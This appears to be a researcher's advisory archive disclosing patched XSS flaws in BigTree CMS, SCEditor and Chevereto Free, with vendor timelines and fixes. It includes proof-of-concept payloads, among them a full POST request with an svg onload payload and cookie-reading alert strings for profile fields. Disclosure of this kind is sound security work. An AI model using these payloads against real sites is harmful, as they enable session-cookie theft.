Advisory Archives • Edric Teo

BigTree CMS – XSS Vulnerability in Version 4.4.7

Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)

The following is a POST request to create a tag with the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on;
bigtree_admin[email][email protected];
bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with tag-adding capability is able to steal the cookie of another user with higher privilege.

Solution:

Update to Bigtree CMS version 4.4.9.

Timeline:

Vulnerability found: 11.02.2020

The vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020

References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11

[CVE-2019-19466] SCEditor – XSS Vulnerability in Version 2.1.3

Product Information:

Software: SCEditor

Tested Version: 2.1.3, released 04.05.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: A lightweight, open source, WYSIWYG BBCode and (X)HTML editor. (copied from https://www.sceditor.com/)

Vulnerability description:

There are 3 XSS vulnerabilities in SCEditor version 2.1.3.

The following are the three default features which are vulnerable to XSS:

Insert image
Insert email
Insert link

The relevant code could be found in /src/lib/defaultCommands.js.

editor.wysiwygEditorInsertHtml(
	'<img' + attrs + ' src="' + url + '" />' // line 505
);

editor.wysiwygEditorInsertHtml(
  '<a href="' + 'mailto:' + email + '">' + // line 550
  	 (text || email) +
  '</a>'
  );

editor.wysiwygEditorInsertHtml(
	'<a href="' + url + '">' + text + '</a>' // line 610
 );

Impact:

The 3 identified dom-based XSS have limited impact and are dependent on how these variables are used. Projects implementing SCEditor should take extra care to ensure proper sanitization.

Solution:

Sanitize the variables mentioned in the vulnerability description section.

Timeline:

Vulnerability found: 1.09.2019

The vendor informed: 01.09.2019 & 26.11.2019

Public Advisory: 05.12.2019 (Passed 90-days since initial contact)

References:

https://github.com/samclarke/SCEditor/commit/7fd14aecc6f0c68f1e8bb98b12f6f0da769c671a – reference for the latest version

[CVE-2018-12030] Chevereto Free – XSS Vulnerability in Version 1.0.12

Product Information:

Software: Chevereto Free

Tested Version: 1.0.12, released 23.04.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: Chevereto Free has the same look and feels as our paid edition and it includes all the essential image hosting functionalities. Install it in seconds, and fall in love in minutes. (copied from https://chevereto.com/free)

Important note:

Chevereto Free is a fork of Chevereto (the paid version). This advisory focuses solely only on the Free version and does not in any way refer to Chevereto (the paid version).

Vulnerability description:

There are two XSS vulnerabilities in Chevereto Free version 1.0.12.

Both are located at /chevereto/settings/profile.

Navigate as a regular user to /chevereto/settings/profile.

1) Authenticated Reflected XSS

Enter a" onmouseover="alert(document.cookie)" " in the name field and click Save changes. The payload should not be seen upon saving.

Hover the cursor over the name element and the payload should trigger. Due to the implementation, this does not persist. Subsequent attempts of the payload will be evaluated as a value instead.

Affected parameter: name

2) Authenticated Stored XSS

Enter a"></textarea><svg/onload=alert(document.cookie)> in the biofield and click Save changes.

Navigate away from the current page and return to /chevereto/settings/profile. The payload should trigger.

Affected parameter: bio

Impact:

The first XSS vulnerability does not have any attack scenario since the payload is rendered as value for subsequent attempts.

An attacker could potentially use the second XSS vulnerability to steal the cookie of an administrator.

Solution:

Upgrade to the paid version or
Upgrade to Chevereto Free version 1.0.13

Timeline:

Vulnerability found: 06.06.2018

The vendor informed: 07.06.2018

Response by vendor: 07.06.2018

Fix by vendor: 07.06.2018

The patched version released: 07.06.2018

Public Advisory: 08.06.2018

References:

https://github.com/Chevereto/Chevereto-Free/commit/159daeab6adfe828bd06e6e74f5b647bf9b1bb70